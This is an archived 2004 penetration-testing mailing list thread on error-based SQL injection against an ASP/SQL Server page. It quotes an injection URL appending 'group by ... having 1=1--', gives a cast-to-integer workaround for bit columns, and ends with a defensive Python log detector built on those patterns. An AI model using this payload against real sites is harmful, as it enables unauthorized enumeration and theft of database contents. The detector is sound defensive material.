From: Thor (thor@hammerofgod.com)
Date: Wed May 12 2004 - 14:30:40 EDT
Try casting the column as integer first. SQL2000 will do this for you in a
standard query; your ODBC driver may not.
So, it would be "group by cast(sometable.column1 as integer)"
t
----- Original Message -----
From: "Chan Fook Sheng" <chanfooksheng@pacific.net.sg>
To: <pen-test@securityfocus.com>
Sent: Wednesday, May 12, 2004 3:31 AM
Subject: enumeration of SQL column names failed when a column is of type "bit"
> Hi
>
> I am following David Litchfield's excellent paper on SQL "Web App
> disassembly with ODBC Error Messages" on how to enumerate column names.
>
> The method appends "having 1=1--" and "group by" in the URL.
>
> Everything went well, but then if I have a table that contains a column of
> "bit" type, the method outlined in the paper will fail.
>
> i.e.
>
> http://somesite/somepage.asp?id=1%20group%20by%20sometable.coulmn1,%20sometable.coulmn2%20having%201=1--
>
> Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Cannot group by a bit column.
>
> Anyone aware of any other methods?
>
> fook sheng
>
>
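From the defending side, the requests and error text discussed in this thread are easy to spot in web logs. The following is an added example, not part of the original messages: a small detector that flags query strings carrying the appended "group by" / "having 1=1--" clauses and responses that return the ODBC driver error to the client. The function names and the sample records are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Clauses the thread describes being appended to a request parameter.
SQLI_PATTERNS = {
    "having-tautology": re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "group-by": re.compile(r"\bgroup\s+by\s+[\w.\[\]]+", re.I),
    "trailing-comment": re.compile(r"--\s*$"),
}
# Driver error text as quoted in the thread; its presence in a response body
# means detailed database errors are being returned to the client.
ERROR_LEAK = re.compile(
    r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]|80040e14", re.I)

def scan_url(url):
    """Return the sorted pattern names found in URL-decoded query values."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(k for k, rx in SQLI_PATTERNS.items() if rx.search(value))
    return sorted(hits)

def is_suspicious(url):
    # One pattern alone ("group by" in a search box) is weak evidence;
    # require two or more to cut false positives.
    return len(scan_url(url)) >= 2

def leaks_db_error(body):
    return bool(ERROR_LEAK.search(body))

def triage(records):
    """records: iterable of (url, response_body). Return a list of findings."""
    findings = []
    for url, body in records:
        if is_suspicious(url) or leaks_db_error(body):
            findings.append({"url": url, "patterns": scan_url(url),
                             "error_leak": leaks_db_error(body)})
    return findings

# Constructed sample records; the first URL and error text are from the thread.
SAMPLE = [
    ("http://somesite/somepage.asp?id=1%20group%20by%20sometable.coulmn1,"
     "%20sometable.coulmn2%20having%201=1--",
     "[Microsoft][ODBC SQL Server Driver][SQL Server]Cannot group by a bit column."),
    ("http://somesite/somepage.asp?id=1", "<html>ok</html>"),
    ("http://somesite/search.asp?q=group+by+age", "<html>results</html>"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```

A hit on `error_leak` is worth fixing even without a matching request: returning generic error pages and using parameterized queries removes the feedback channel the enumeration depends on.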
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:54 EDT